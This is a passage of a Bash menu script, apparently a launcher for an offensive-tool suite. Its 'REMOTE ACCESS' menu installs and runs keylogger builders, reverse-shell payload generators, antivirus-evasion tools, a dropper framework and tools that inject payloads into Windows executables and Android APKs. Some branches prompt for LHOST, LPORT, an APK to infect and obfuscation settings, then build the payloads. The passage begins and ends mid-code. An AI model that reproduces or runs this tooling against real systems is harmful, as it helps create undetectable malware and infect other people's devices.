  3697. elif [[ "$OSFR" = "0" ]]
  3698. then
  3699. exit
  3700. elif [[ "$OSFR" = "00" ]]
  3701. then
  3702. exec bash "$0"
  3703. elif [[ "$OSFR" = "back" || "$OSFR" = "b" ]]
  3704. then
  3705. break
  3706. else
  3707. echo -e "Wrong choice"
  3708. sleep 0.3
  3709. clear
  3710. exec bash "$0"
  3711. fi
  3712. done
  3713. else
  3714. echo -e "$TNI"
  3715. read INSTALL
  3716. if [[ "$INSTALL" = "install" ]]
  3717. then
  3718. install_osrframework
  3719. else
  3720. continue
  3721. fi
  3722. fi
  3723. elif [[ "$APPP" = "0" ]]
  3724. then
  3725. clear
  3726. exit
  3727. elif [[ "$APPP" = "00" ]]
  3728. then
  3729. clear
  3730. exec bash "$0"
  3731. elif [[ "$APPP" = "back" || "$APPP" = "b" ]]
  3732. then
  3733. break
  3734. fi
  3735. if [[ "$APPP" != "" ]]
  3736. then
  3737. echo -e "$PAKTGB"
  3738. $READAK
  3739. fi
  3740. done
  3741. }
  3742. function remote_access
  3743. {
  3744. while true
  3745. do
  3746. clear
  3747. TERMINALTITLE="REMOTE ACCESS"
  3748. dash_calc
  3749. printf '\033]2;REMOTE ACCESS\a'
  3750. if [[ -d /root/BeeLogger ]]
  3751. then
  3752. echo -e ""$YS" 1"$CE") BeeLogger Generate Gmail Emailing Keyloggers to Windows"
  3753. else
  3754. echo -e ""$RS" 1"$CE") "$RS"BeeLogger"$CE" Generate Gmail Emailing Keyloggers to Windows"
  3755. fi
  3756. if [[ -d /root/ezsploit ]]
  3757. then
  3758. echo -e ""$YS" 2"$CE") Ezsploit Automation for metasploit"
  3759. else
  3760. echo -e ""$RS" 2"$CE") "$RS"Ezsploit"$CE" Automation for metasploit"
  3761. fi
  3762. if [[ -d /root/pupy ]]
  3763. then
  3764. echo -e ""$YS" 3"$CE") Pupy Remote administration and post-exploitation tool"
  3765. else
  3766. echo -e ""$RS" 3"$CE") "$RS"Pupy"$CE" Remote administration and post-exploitation tool"
  3767. fi
  3768. if [[ -d /root/zirikatu ]]
  3769. then
  3770. echo -e ""$YS" 4"$CE") Zirikatu Fud Payload generator script"
  3771. else
  3772. echo -e ""$RS" 4"$CE") "$RS"Zirikatu"$CE" Fud Payload generator script"
  3773. fi
  3774. if [[ -d /root/TheFatRat ]]
  3775. then
  3776. echo -e ""$YS" 5"$CE") TheFatRat Generate undetectable payloads"
  3777. else
  3778. echo -e ""$RS" 5"$CE") "$RS"TheFatRat"$CE" Generate undetectable payloads"
  3779. fi
  3780. if [[ -d /root/Winpayloads ]]
  3781. then
  3782. echo -e ""$YS" 6"$CE") Winpayloads Generate undetectable payloads"
  3783. else
  3784. echo -e ""$RS" 6"$CE") "$RS"Winpayloads"$CE" Generate undetectable payloads"
  3785. fi
  3786. if [[ -f /usr/bin/shellter ]]
  3787. then
  3788. echo -e ""$YS" 7"$CE") Shellter Inject payload into .exe"
  3789. else
  3790. echo -e ""$RS" 7"$CE") "$RS"Shellter"$CE" Inject payload into .exe"
  3791. fi
  3792. if [[ -d /root/CHAOS ]]
  3793. then
  3794. echo -e ""$YS" 8"$CE") CHAOS Generate payloads/listeners"
  3795. else
  3796. echo -e ""$RS" 8"$CE") "$RS"CHAOS"$CE" Generate payloads/listeners"
  3797. fi
  3798. if [[ -d /root/kwetza ]]
  3799. then
  3800. echo -e ""$YS" 9"$CE") Kwetza Inject payload to apk"
  3801. else
  3802. echo -e ""$RS" 9"$CE") "$RS"Kwetza"$CE" Inject payload to apk"
  3803. fi
  3804. if [[ -d /root/koadic ]]
  3805. then
  3806. echo -e ""$YS"10"$CE") Koadic Windows post-exploitation rootkit"
  3807. else
  3808. echo -e ""$RS"10"$CE") "$RS"Koadic"$CE" Windows post-exploitation rootkit"
  3809. fi
  3810. if [[ -d /root/Empire ]]
  3811. then
  3812. echo -e ""$YS"11"$CE") Empire PowerShell and Python post-exploitation agent"
  3813. else
  3814. echo -e ""$RS"11"$CE") "$RS"Empire"$CE" PowerShell and Python post-exploitation agent"
  3815. fi
  3816. if [[ -d /root/Meterpreter_Paranoid_Mode-SSL ]]
  3817. then
  3818. echo -e ""$YS"12"$CE") Meterpreter Paranoid Meterpreter Paranoid Mode - SSL/TLS connections"
  3819. else
  3820. echo -e ""$RS"12"$CE") "$RS"Meterpreter Paranoid"$CE" Meterpreter Paranoid Mode - SSL/TLS connections"
  3821. fi
  3822. if [[ -d /root/Dr0p1t-Framework ]]
  3823. then
  3824. echo -e ""$YS"13"$CE") Dr0p1t-Framework Create an advanced stealthy dropper"
  3825. else
  3826. echo -e ""$RS"13"$CE") "$RS"Dr0p1t-Framework"$CE" Create an advanced stealthy dropper"
  3827. fi
  3828. if [[ -d /root/Veil ]]
  3829. then
  3830. echo -e ""$YS"14"$CE") Veil-Framework Generate payloads that bypass common anti-virus"
  3831. else
  3832. echo -e ""$RS"14"$CE") "$RS"Veil-Framework"$CE" Generate payloads that bypass common anti-virus"
  3833. fi
  3834. if [[ -d /root/leviathan ]]
  3835. then
  3836. echo -e ""$YS"15"$CE") Leviathan Wide range mass audit toolkit"
  3837. else
  3838. echo -e ""$RS"15"$CE") "$RS"Leviathan"$CE" Wide range mass audit toolkit"
  3839. fi
  3840. if [[ -d /root/FakeImageExploiter ]]
  3841. then
  3842. echo -e ""$YS"16"$CE") FakeImageExploiter Use a Fake image.jpg to exploit targets"
  3843. else
  3844. echo -e ""$RS"16"$CE") "$RS"FakeImageExploiter"$CE" Use a Fake image.jpg to exploit targets"
  3845. fi
  3846. if [[ -d /root/avet ]]
  3847. then
  3848. echo -e ""$YS"17"$CE") Avet AntiVirus Evasion Tool"
  3849. else
  3850. echo -e ""$RS"17"$CE") "$RS"Avet"$CE" AntiVirus Evasion Tool"
  3851. fi
  3852. if [[ -d /root/ARCANUS ]]
  3853. then
  3854. echo -e ""$YS"18"$CE") Arcanus Customized payload generator/handler"
  3855. else
  3856. echo -e ""$RS"18"$CE") "$RS"Arcanus"$CE" Customized payload generator/handler"
  3857. fi
  3858. if [[ -f /usr/bin/msfpc ]]
  3859. then
  3860. echo -e ""$YS"19"$CE") MSFPC MSFvenom Payload Creator"
  3861. else
  3862. echo -e ""$RS"19"$CE") "$RS"MSFPC"$CE" MSFvenom Payload Creator"
  3863. fi
  3864. if [[ -d /root/morphHTA ]]
  3865. then
  3866. echo -e ""$YS"20"$CE") morphHTA Morphing Cobalt Strike's evil.HTA"
  3867. else
  3868. echo -e ""$RS"20"$CE") "$RS"morphHTA"$CE" Morphing Cobalt Strike's evil.HTA"
  3869. fi
  3870. if [[ -d /root/LFISuite ]]
  3871. then
  3872. echo -e ""$YS"21"$CE") LFISuite Totally Automatic LFI Exploiter and Scanner"
  3873. else
  3874. echo -e ""$RS"21"$CE") "$RS"LFISuite"$CE" Totally Automatic LFI Exploiter and Scanner"
  3875. fi
  3876. if [[ -d /root/UniByAv ]]
  3877. then
  3878. echo -e ""$YS"22"$CE") UniByAv Generate undetectable executable from raw shellcode"
  3879. else
  3880. echo -e ""$RS"22"$CE") "$RS"UniByAv"$CE" Generate undetectable executable from raw shellcode"
  3881. fi
  3882. if [[ -d /root/demiguise ]]
  3883. then
  3884. echo -e ""$YS"23"$CE") Demiguise HTA encryption tool for RedTeams"
  3885. else
  3886. echo -e ""$RS"23"$CE") "$RS"Demiguise"$CE" HTA encryption tool for RedTeams"
  3887. fi
  3888. if [[ -d /root/DKMC ]]
  3889. then
  3890. echo -e ""$YS"24"$CE") DKMC Malicious payload evasion tool into image"
  3891. else
  3892. echo -e ""$RS"24"$CE") "$RS"DKMC"$CE" Malicious payload evasion tool into image"
  3893. fi
  3894. if [[ -d /usr/share/beef-xss ]]
  3895. then
  3896. echo -e ""$YS"25"$CE") Beef The browser exploitation framework"
  3897. else
  3898. echo -e ""$RS"25"$CE") "$RS"Beef"$CE" The browser exploitation framework"
  3899. fi
  3900. if [[ -d /root/Evil-Droid ]]
  3901. then
  3902. echo -e ""$YS"26"$CE") Evil-Droid Penetrate android platforms"
  3903. else
  3904. echo -e ""$RS"26"$CE") "$RS"Evil-Droid"$CE" Penetrate android platforms"
  3905. fi
  3906. echo -e ""$YS" b"$CE") Go back"
  3907. echo -e ""$YS"00"$CE") Main menu"
  3908. #echo -e ""$YS" 0"$CE") EXIT"
  3909. echo -e "Choose: "
  3910. read -e KEYLOG
  3911. clear
  3912. if [[ "$KEYLOG" = "1" ]]
  3913. then
  3914. if [[ -d /root/BeeLogger ]]
  3915. then
  3916. cd /root/BeeLogger
  3917. python bee.py
  3918. cd
  3919. else
  3920. echo -e "$TNI"
  3921. read INSTALL
  3922. if [[ "$INSTALL" = "install" ]]
  3923. then
  3924. install_beelogger
  3925. else
  3926. continue
  3927. fi
  3928. fi
  3929. elif [[ "$KEYLOG" = "10" ]]
  3930. then
  3931. if [[ -d /root/koadic ]]
  3932. then
  3933. cd /root/koadic
  3934. ./koadic
  3935. else
  3936. echo -e "$TNI"
  3937. read INSTALL
  3938. if [[ "$INSTALL" = "install" ]]
  3939. then
  3940. install_koadic
  3941. else
  3942. continue
  3943. fi
  3944. fi
  3945. elif [[ "$KEYLOG" = "11" ]]
  3946. then
  3947. if [[ -d /root/Empire ]]
  3948. then
  3949. cd /root/Empire
  3950. ./empire
  3951. else
  3952. echo -e "$TNI"
  3953. read INSTALL
  3954. if [[ "$INSTALL" = "install" ]]
  3955. then
  3956. install_empire
  3957. else
  3958. continue
  3959. fi
  3960. fi
  3961. elif [[ "$KEYLOG" = "12" ]]
  3962. then
  3963. if [[ -d /root/Meterpreter_Paranoid_Mode-SSL ]]
  3964. then
  3965. cd /root/Meterpreter_Paranoid_Mode-SSL
  3966. ./Meterpreter_Paranoid_Mode.sh
  3967. else
  3968. echo -e "$TNI"
  3969. read INSTALL
  3970. if [[ "$INSTALL" = "install" ]]
  3971. then
  3972. install_meterpreter_paranoid_mode
  3973. else
  3974. continue
  3975. fi
  3976. fi
  3977. elif [[ "$KEYLOG" = "13" ]]
  3978. then
  3979. if [[ -d /root/Dr0p1t-Framework ]]
  3980. then
  3981. cd /root/Dr0p1t-Framework
  3982. dropit_automation
  3983. else
  3984. echo -e "$TNI"
  3985. read INSTALL
  3986. if [[ "$INSTALL" = "install" ]]
  3987. then
  3988. install_dropit_frmw
  3989. else
  3990. continue
  3991. fi
  3992. fi
  3993. elif [[ "$KEYLOG" = "14" ]]
  3994. then
  3995. if [[ -d /root/Veil ]]
  3996. then
  3997. cd /root/Veil
  3998. ./Veil.py
  3999. else
  4000. echo -e "$TNI"
  4001. read INSTALL
  4002. if [[ "$INSTALL" = "install" ]]
  4003. then
  4004. install_veil
  4005. else
  4006. continue
  4007. fi
  4008. fi
  4009. elif [[ "$KEYLOG" = "15" ]]
  4010. then
  4011. if [[ -d /root/leviathan ]]
  4012. then
  4013. cd /root/leviathan
  4014. python leviathan.py
  4015. else
  4016. echo -e "$TNI"
  4017. read INSTALL
  4018. if [[ "$INSTALL" = "install" ]]
  4019. then
  4020. install_leviathan
  4021. else
  4022. continue
  4023. fi
  4024. fi
  4025. elif [[ "$KEYLOG" = "16" ]]
  4026. then
  4027. if [[ -d /root/FakeImageExploiter ]]
  4028. then
  4029. cd /root/FakeImageExploiter
  4030. nano settings
  4031. ./FakeImageExploiter.sh
  4032. else
  4033. echo -e "$TNI"
  4034. read INSTALL
  4035. if [[ "$INSTALL" = "install" ]]
  4036. then
  4037. install_fake_image
  4038. else
  4039. continue
  4040. fi
  4041. fi
  4042. elif [[ "$KEYLOG" = "17" ]]
  4043. then
  4044. if [[ -d /root/avet ]]
  4045. then
  4046. cd /root/avet/build
  4047. ls -1 build*
  4048. echo -e ""
  4049. echo -e "Type which one you want: "
  4050. read AVE
  4051. if [[ ! -f /root/avet/build/"$AVE" ]]
  4052. then
  4053. echo -e ""$RS"File not found"$CE""
  4054. sleep 2
  4055. else
  4056. nano /root/avet/build/"$AVE"
  4057. echo -e "$PAKTC"
  4058. $READAK
  4059. cd /root/avet
  4060. ./build/"$AVE"
  4061. gio open /root/avet
  4062. fi
  4063. else
  4064. echo -e "$TNI"
  4065. read INSTALL
  4066. if [[ "$INSTALL" = "install" ]]
  4067. then
  4068. install_avet
  4069. else
  4070. continue
  4071. fi
  4072. fi
  4073. elif [[ "$KEYLOG" = "18" ]]
  4074. then
  4075. if [[ -d /root/ARCANUS ]]
  4076. then
  4077. cd /root/ARCANUS
  4078. gnome-terminal -e "./ARCANUS & disown"
  4079. else
  4080. echo -e "$TNI"
  4081. read INSTALL
  4082. if [[ "$INSTALL" = "install" ]]
  4083. then
  4084. install_arcanus
  4085. else
  4086. continue
  4087. fi
  4088. fi
  4089. elif [[ "$KEYLOG" = "19" ]]
  4090. then
  4091. if [[ -f /usr/bin/msfpc ]]
  4092. then
  4093. while true
  4094. do
  4095. clear
  4096. echo -e ""$YS" 1"$CE") APK"
  4097. echo -e ""$YS" 2"$CE") ASP"
  4098. echo -e ""$YS" 3"$CE") ASPX"
  4099. echo -e ""$YS" 4"$CE") Bash [.sh]"
  4100. echo -e ""$YS" 5"$CE") Java [.jsp]"
  4101. echo -e ""$YS" 6"$CE") Linux [.elf]"
  4102. echo -e ""$YS" 7"$CE") OSX [.macho]"
  4103. echo -e ""$YS" 8"$CE") Perl [.pl]"
  4104. echo -e ""$YS" 9"$CE") PHP"
  4105. echo -e ""$YS"10"$CE") Powershell [.ps1]"
  4106. echo -e ""$YS"11"$CE") Python [.py]"
  4107. echo -e ""$YS"12"$CE") Tomcat [.war]"
  4108. echo -e ""$YS"13"$CE") Windows [.exe // .dll]"
  4109. echo -e ""$YS"ENTER"$CE") Windows [.exe // .dll]"
  4110. echo -e ""
  4111. echo -e "Choose: "
  4112. read TYPE
  4113. if [[ "$TYPE" -le 13 && "$TYPE" -ge 1 ]]
  4114. then
  4115. if [[ "$TYPE" = 1 ]]
  4116. then
  4117. MTYPE="APK"
  4118. elif [[ "$TYPE" = 2 ]]
  4119. then
  4120. MTYPE="ASP"
  4121. elif [[ "$TYPE" = 3 ]]
  4122. then
  4123. MTYPE="ASPX"
  4124. elif [[ "$TYPE" = 4 ]]
  4125. then
  4126. MTYPE="bash"
  4127. elif [[ "$TYPE" = 5 ]]
  4128. then
  4129. MTYPE="java"
  4130. elif [[ "$TYPE" = 6 ]]
  4131. then
  4132. MTYPE="linux"
  4133. elif [[ "$TYPE" = 7 ]]
  4134. then
  4135. MTYPE="OSX"
  4136. elif [[ "$TYPE" = 8 ]]
  4137. then
  4138. MTYPE="perl"
  4139. elif [[ "$TYPE" = 9 ]]
  4140. then
  4141. MTYPE="PHP"
  4142. elif [[ "$TYPE" = 10 ]]
  4143. then
  4144. MTYPE="powershell"
  4145. elif [[ "$TYPE" = 11 ]]
  4146. then
  4147. MTYPE="python"
  4148. elif [[ "$TYPE" = 12 ]]
  4149. then
  4150. MTYPE="tomcat"
  4151. elif [[ "$TYPE" = 13 ]]
  4152. then
  4153. MTYPE="windows"
  4154. fi
  4155. else
  4156. if [[ "$TYPE" = "" ]]
  4157. then
  4158. MTYPE="windows"
  4159. else
  4160. echo -e ""$RS"Wrong choise"$CE""
  4161. sleep 1
  4162. clear
  4163. continue
  4164. fi
  4165. fi
  4166. clear
  4167. echo -e "LHOST: "
  4168. read MLHOST
  4169. clear
  4170. echo -e "LPORT: "
  4171. read MLPORT
  4172. clear
  4173. echo -e ""$YS" 1"$CE") CMD Smaller size but less features"
  4174. echo -e ""$YS" 2"$CE") MSF Bigger size but more features"
  4175. echo -e ""$YS"ENTER"$CE") MSF"
  4176. echo -e "Choose: "
  4177. read CMDMSF
  4178. if [[ "$CMDMSF" = 1 ]]
  4179. then
  4180. MCMDMSF="CMD"
  4181. else
  4182. MCMDMSF="MSF"
  4183. fi
  4184. clear
  4185. echo -e ""$YS" 1"$CE") Bind"
  4186. echo -e ""$YS" 2"$CE") Reverse"
  4187. echo -e ""$YS"ENTER"$CE") Reverse"
  4188. echo -e "Choose: "
  4189. read BR
  4190. if [[ "$BR" = 1 ]]
  4191. then
  4192. MBR="BIND"
  4193. else
  4194. MBR="REVERSE"
  4195. fi
  4196. clear
  4197. echo -e ""$YS" 1"$CE") Staged"
  4198. echo -e ""$YS" 2"$CE") Stageless"
  4199. echo -e ""$YS"ENTER"$CE") Staged"
  4200. echo -e "Choose: "
  4201. read SORS
  4202. if [[ "$SORS" = 2 ]]
  4203. then
  4204. MSORS="STAGELESS"
  4205. else
  4206. MSORS="STAGED"
  4207. fi
  4208. clear
  4209. echo -e ""$YS" 1"$CE") TCP"
  4210. echo -e ""$YS" 2"$CE") HTTP"
  4211. echo -e ""$YS" 3"$CE") HTTPS"
  4212. echo -e ""$YS" 4"$CE") FIND_PORT"
  4213. echo -e ""$YS"ENTER"$CE") TCP"
  4214. echo -e "Choose: "
  4215. read PRT
  4216. if [[ "$PRT" = 2 ]]
  4217. then
  4218. MPRT="HTTP"
  4219. elif [[ "$PRT" = 3 ]]
  4220. then
  4221. MPRT="HTTPS"
  4222. elif [[ "$PRT" = 4 ]]
  4223. then
  4224. MPRT="FIND_PORT"
  4225. else
  4226. MPRT="TCP"
  4227. fi
  4228. clear
  4229. msfpc $MTYPE $MLHOST $MLPORT $MCMDMSF $MBR $MSORS $MPRT
  4230. break
  4231. done
  4232. else
  4233. echo -e "$TNI"
  4234. read INSTALL
  4235. if [[ "$INSTALL" = "install" ]]
  4236. then
  4237. install_msfpc
  4238. else
  4239. continue
  4240. fi
  4241. fi
  4242. elif [[ "$KEYLOG" = "20" ]]
  4243. then
  4244. if [[ -d /root/morphHTA ]]
  4245. then
  4246. while true
  4247. do
  4248. clear
  4249. echo -e "Your file's path: "
  4250. read FPATH
  4251. if [[ ! -f "$FPATH" ]]
  4252. then
  4253. echo -e ""$RS"File does not exist"$CE""
  4254. sleep 2
  4255. continue
  4256. fi
  4257. clear
  4258. echo -e ""$YS" 1"$CE") MSHTA"
  4259. echo -e ""$YS" 2"$CE") Explorer"
  4260. echo -e ""$YS" 3"$CE") WmiPrvSE"
  4261. echo -e ""$YS"ENTER"$CE") Explorer"
  4262. echo -e "Choose technique to use:: "
  4263. read MODE
  4264. if [[ "$MODE" = 1 ]]
  4265. then
  4266. MMODE="mshta"
  4267. elif [[ "$MODE" = 3 ]]
  4268. then
  4269. MMODE="wmiprvse"
  4270. else
  4271. MMODE="explorer"
  4272. fi
  4273. clear
  4274. echo -e "Enter max length of randomly generated strings: "
  4275. echo -e ""$YS"ENTER"$CE") 1000"
  4276. read M1
  4277. if [[ "$M1" = "" ]]
  4278. then
  4279. M1=1000
  4280. fi
  4281. clear
  4282. echo -e "Enter max length of randomly generated variable names: "
  4283. echo -e ""$YS"ENTER"$CE") 40"
  4284. read M2
  4285. if [[ "$M2" = "" ]]
  4286. then
  4287. M2=40
  4288. fi
  4289. clear
  4290. echo -e "Enter max number of times values should be split in chr obfuscation: "
  4291. echo -e ""$YS"ENTER"$CE") 10"
  4292. read M3
  4293. if [[ "$M3" = "" ]]
  4294. then
  4295. M3=10
  4296. fi
  4297. clear
  4298. echo -e "Enter value of each split: "
  4299. echo -e ""$YS"ENTER"$CE") 10"
  4300. read M4
  4301. if [[ "$M4" = "" ]]
  4302. then
  4303. M4=10
  4304. fi
  4305. while true
  4306. do
  4307. clear
  4308. echo -e "Enter file to output the morphed HTA to: "
  4309. echo -e ""$YS"ENTER"$CE") /root/Desktop/morph.HTA"
  4310. read M5
  4311. if [[ "$M5" = "" ]]
  4312. then
  4313. M5="/root/Desktop/morph.HTA"
  4314. fi
  4315. if [[ -f "$M5" ]]
  4316. then
  4317. echo -e ""$RS"File already exists"$CE""
  4318. sleep 3
  4319. continue
  4320. else
  4321. break
  4322. fi
  4323. done
  4324. break
  4325. done
  4326. clear
  4327. cd /root/morphHTA
  4328. python morph-hta.py --in "$FPATH" --out "$M5" --mode "$M1" --maxstrlen "$M2" --maxvarlen "$M3" --maxnumsplit "$M4"
  4329. cd
  4330. else
  4331. echo -e "$TNI"
  4332. read INSTALL
  4333. if [[ "$INSTALL" = "install" ]]
  4334. then
  4335. install_morphhta
  4336. else
  4337. continue
  4338. fi
  4339. fi
  4340. elif [[ "$KEYLOG" = "21" ]]
  4341. then
  4342. if [[ -d /root/LFISuite ]]
  4343. then
  4344. cd /root/LFISuite
  4345. python lfisuite.py
  4346. else
  4347. echo -e "$TNI"
  4348. read INSTALL
  4349. if [[ "$INSTALL" = "install" ]]
  4350. then
  4351. install_lfi
  4352. else
  4353. continue
  4354. fi
  4355. fi
  4356. elif [[ "$KEYLOG" = "22" ]]
  4357. then
  4358. if [[ -d /root/UniByAv ]]
  4359. then
  4360. while true
  4361. do
  4362. clear
  4363. echo -e "Path to raw shellcode file you want to use: "
  4364. read RPATH
  4365. if [[ ! -f "$RPATH" ]]
  4366. then
  4367. echo -e ""$RS"File not found"$CE""
  4368. sleep 2
  4369. continue
  4370. fi
  4371. clear
  4372. echo -e "Name of output file: "
  4373. read OUT
  4374. if [[ -f "$OUT" ]]
  4375. then
  4376. echo -e ""$RS"File already exists"$CE""
  4377. sleep 2
  4378. continue
  4379. fi
  4380. clear
  4381. echo -e "Bypass Antivirus or just generate executable?"
  4382. echo -e ""$YS" 1"$CE") Bypass"
  4383. echo -e ""$YS" 2"$CE") Just generate"
  4384. echo -e ""$YS"ENTER"$CE") Bypass"
  4385. echo -e "Choose: "
  4386. read BORG
  4387. clear
  4388. if [[ "$BORG" = 2 ]]
  4389. then
  4390. echo -e ""$YS" 1"$CE") domain.json"
  4391. echo -e ""$YS" 2"$CE") process-and-time-evasion.json"
  4392. echo -e ""$YS" 3"$CE") process-evasion.json"
  4393. echo -e ""$YS"ENTER"$CE") process-evasion.json"
  4394. echo -e "Choose: "
  4395. read CONF
  4396. if [[ "$CONF" = 1 ]]
  4397. then
  4398. FC="domain.json"
  4399. elif [[ "$CONF" = 2 ]]
  4400. then
  4401. FC="process-and-time-evasion.json"
  4402. else
  4403. FC="process-evasion.json"
  4404. fi
  4405. cd /root/UniByAv
  4406. python UniByAv*.py "$RPATH" "$OUT" none /root/UniByAv/configs/"$FC"
  4407. break
  4408. else
  4409. #~ GCC=$(which gcc)
  4410. #~ if [[ "$GCC" = "" ]]
  4411. #~ then
  4412. #~ echo -e ""$RS"gcc not found on your system"$CE""
  4413. #~ sleep 2
  4414. #~ echo -e "Proceeding without bypassing Antivirus..."
  4415. #~ sleep 3
  4416. #~ clear
  4417. #~ echo -e ""$YS" 1"$CE") domain.json"
  4418. #~ echo -e ""$YS" 2"$CE") process-and-time-evasion.json"
  4419. #~ echo -e ""$YS" 3"$CE") process-evasion.json"
  4420. #~ echo -e ""$YS"ENTER"$CE") process-evasion.json"
  4421. #~ echo -e "Choose: "
  4422. #~ read CONF
  4423. #~ if [[ "$CONF" = 1 ]]
  4424. #~ then
  4425. #~ FC="domain.json"
  4426. #~ elif [[ "$CONF" = 2 ]]
  4427. #~ then
  4428. #~ FC="process-and-time-evasion.json"
  4429. #~ else
  4430. #~ FC="process-evasion.json"
  4431. #~ fi
  4432. #~ cd /root/UniByAv
  4433. #~ python UniByAv*.py "$RPATH" "$OUT" none /root/UniByAv/configs/"$FC"
  4434. #~ break
  4435. #~ else
  4436. echo -e "Path to mingw32-gcc.exe : "
  4437. read PGCC
  4438. #~ if [[ "$PGCC" = "" ]]
  4439. #~ then
  4440. #~ PGCC="$GCC"
  4441. #~ fi
  4442. clear
  4443. echo -e ""$YS" 1"$CE") domain.json"
  4444. echo -e ""$YS" 2"$CE") process-and-time-evasion.json"
  4445. echo -e ""$YS" 3"$CE") process-evasion.json"
  4446. echo -e ""$YS"ENTER"$CE") process-evasion.json"
  4447. echo -e "Choose: "
  4448. read CONF
  4449. if [[ "$CONF" = 1 ]]
  4450. then
  4451. FC="domain.json"
  4452. elif [[ "$CONF" = 2 ]]
  4453. then
  4454. FC="process-and-time-evasion.json"
  4455. else
  4456. FC="process-evasion.json"
  4457. fi
  4458. cd /root/UniByAv
  4459. python UniByAv*.py "$RPATH" "$OUT" "$PGCC" /root/UniByAv/configs/"$FC"
  4460. break
  4461. #~ fi
  4462. fi
  4463. done
  4464. cd /root/UniByAv
  4465. python UniByAv*.py
  4466. else
  4467. echo -e "$TNI"
  4468. read INSTALL
  4469. if [[ "$INSTALL" = "install" ]]
  4470. then
  4471. install_unibyav
  4472. else
  4473. continue
  4474. fi
  4475. fi
  4476.  
  4477. elif [[ "$KEYLOG" = "23" ]]
  4478. then
  4479. if [[ -d /root/demiguise ]]
  4480. then
  4481. while true
  4482. do
  4483. clear
  4484. echo -e "Encryption key: "
  4485. read ENC
  4486. clear
  4487. echo -e ""$YS" 1"$CE") ShellBrowserWindow"
  4488. echo -e ""$YS" 2"$CE") Outlook.Application"
  4489. echo -e ""$YS" 3"$CE") Excel.RegisterXLL"
  4490. echo -e ""$YS" 4"$CE") WbemScripting.SWbemLocator"
  4491. echo -e "Choose payload type: "
  4492. read PT
  4493. if [[ "$PT" -le 4 && "$PT" -ge 1 ]]
  4494. then
  4495. if [[ "$PT" = 1 ]]
  4496. then
  4497. PTT="ShellBrowserWindow"
  4498. elif [[ "$PT" = 2 ]]
  4499. then
  4500. PTT="Outlook.Application"
  4501. elif [[ "$PT" = 3 ]]
  4502. then
  4503. PTT="Excel.RegisterXLL"
  4504. elif [[ "$PT" = 4 ]]
  4505. then
  4506. PTT="WbemScripting.SWbemLocator"
  4507. fi
  4508. clear
  4509. echo -e "Command to run from HTA: "
  4510. read CHTA
  4511. if [[ "$CHTA" = "" ]]
  4512. then
  4513. CCHTA=""
  4514. else
  4515. CCHTA="-c "$CHTA""
  4516. fi
  4517. clear
  4518. echo -e "Output file name: "
  4519. read FN
  4520. cd /root/demiguise
  4521. python demiguise.py -k "$ENC" -p "$PTT" "$CCHTA" -o "$FN"
  4522. if [[ -f /root/demiguise/$FN ]]
  4523. then
  4524. echo -e "Output file: /root/demiguise/"$FN""
  4525. else
  4526. if [[ -f /root/demiguise/$FN.html ]]
  4527. then
  4528. echo -e "Output file: /root/demiguise/"$FN".html"
  4529. fi
  4530. fi
  4531. break
  4532. else
  4533. echo -e ""$RS"Wrong choise"$CE""
  4534. sleep 2
  4535. continue
  4536. fi
  4537. done
  4538. else
  4539. echo -e "$TNI"
  4540. read INSTALL
  4541. if [[ "$INSTALL" = "install" ]]
  4542. then
  4543. install_demiguise
  4544. else
  4545. continue
  4546. fi
  4547. fi
  4548. elif [[ "$KEYLOG" = "24" ]]
  4549. then
  4550. if [[ -d /root/DKMC ]]
  4551. then
  4552. cd /root/DKMC
  4553. python dkmc.py
  4554. else
  4555. echo -e "$TNI"
  4556. read INSTALL
  4557. if [[ "$INSTALL" = "install" ]]
  4558. then
  4559. install_dkmc
  4560. else
  4561. continue
  4562. fi
  4563. fi
  4564. elif [[ "$KEYLOG" = "25" ]]
  4565. then
  4566. if [[ -d /usr/share/beef-xss ]]
  4567. then
  4568. cd /usr/share/beef-xss
  4569. ./beef
  4570. else
  4571. echo -e "$TNI"
  4572. read INSTALL
  4573. if [[ "$INSTALL" = "install" ]]
  4574. then
  4575. install_beef
  4576. else
  4577. continue
  4578. fi
  4579. fi
  4580. elif [[ "$KEYLOG" = "26" ]]
  4581. then
  4582. if [[ -d /root/Evil-Droid ]]
  4583. then
  4584. cd /root/Evil-Droid
  4585. ./evil-droid
  4586. else
  4587. echo -e "$TNI"
  4588. read INSTALL
  4589. if [[ "$INSTALL" = "install" ]]
  4590. then
  4591. install_evil_droid
  4592. else
  4593. continue
  4594. fi
  4595. fi
  4596. elif [[ "$KEYLOG" = "8" ]]
  4597. then
  4598. if [[ -d /root/CHAOS ]]
  4599. then
  4600. cd /root/CHAOS
  4601. go run CHAOS.go
  4602. else
  4603. echo -e "$TNI"
  4604. read INSTALL
  4605. if [[ "$INSTALL" = "install" ]]
  4606. then
  4607. install_chaos
  4608. else
  4609. continue
  4610. fi
  4611. fi
  4612. elif [[ "$KEYLOG" = "9" ]]
  4613. then
  4614. if [[ -d /root/kwetza ]]
  4615. then
  4616. cd /root/kwetza
  4617. printf '\033]2;KWETZA\a'
  4618. while true
  4619. do
  4620. clear
  4621. if [[ "$APK" = "" ]]
  4622. then
  4623. APK="\e[1;31mNONE\e[m"
  4624. fi
  4625. if [[ "$APKLH" = "" ]]
  4626. then
  4627. APKLH="\e[1;31mNONE\e[m"
  4628. fi
  4629. if [[ "$APKLP" = "" ]]
  4630. then
  4631. APKLP="\e[1;31mNONE\e[m"
  4632. fi
  4633. if [[ "$APKPROT" = "" ]]
  4634. then
  4635. APKPROT="tcp"
  4636. fi
  4637. if [[ "$APKPERM" = "" ]]
  4638. then
  4639. APKPERM="yes"
  4640. fi
  4641. echo -e ""$YS" 1"$CE") Apk to infect CURRENT:$APK"
  4642. echo -e ""$YS" 2"$CE") LHOST CURRENT:$APKLH"
  4643. echo -e ""$YS" 3"$CE") LPORT CURRENT:$APKLP"
  4644. echo -e ""$YS" 4"$CE") Protocol CURRENT:$APKPROT"
  4645. echo -e ""$YS" 5"$CE") Add additional permissions CURRENT:$APKPERM"
  4646. echo -e ""$YS" b"$CE") Go back"
  4647. echo -e ""$YS" run"$CE") Infect apk"
  4648. echo -e "Choose: "
  4649. read APKK
  4650. clear
  4651. if [[ "$APKK" = 1 ]]
  4652. then
  4653. echo -e "Apk to infect(must be in /root/kwetza): "
  4654. read APKTBI
  4655. if [[ -f "$APKTBI" ]]
  4656. then
  4657. APK="$APKTBI"
  4658. else
  4659. echo -e ""$RS"/root/kwetza/"$APKTBI" not found"$CE""
  4660. sleep 3
  4661. fi
  4662. elif [[ "$APKK" = 2 ]]
  4663. then
  4664. echo -e "LHOST: "
  4665. read APKLH
  4666. elif [[ "$APKK" = 3 ]]
  4667. then
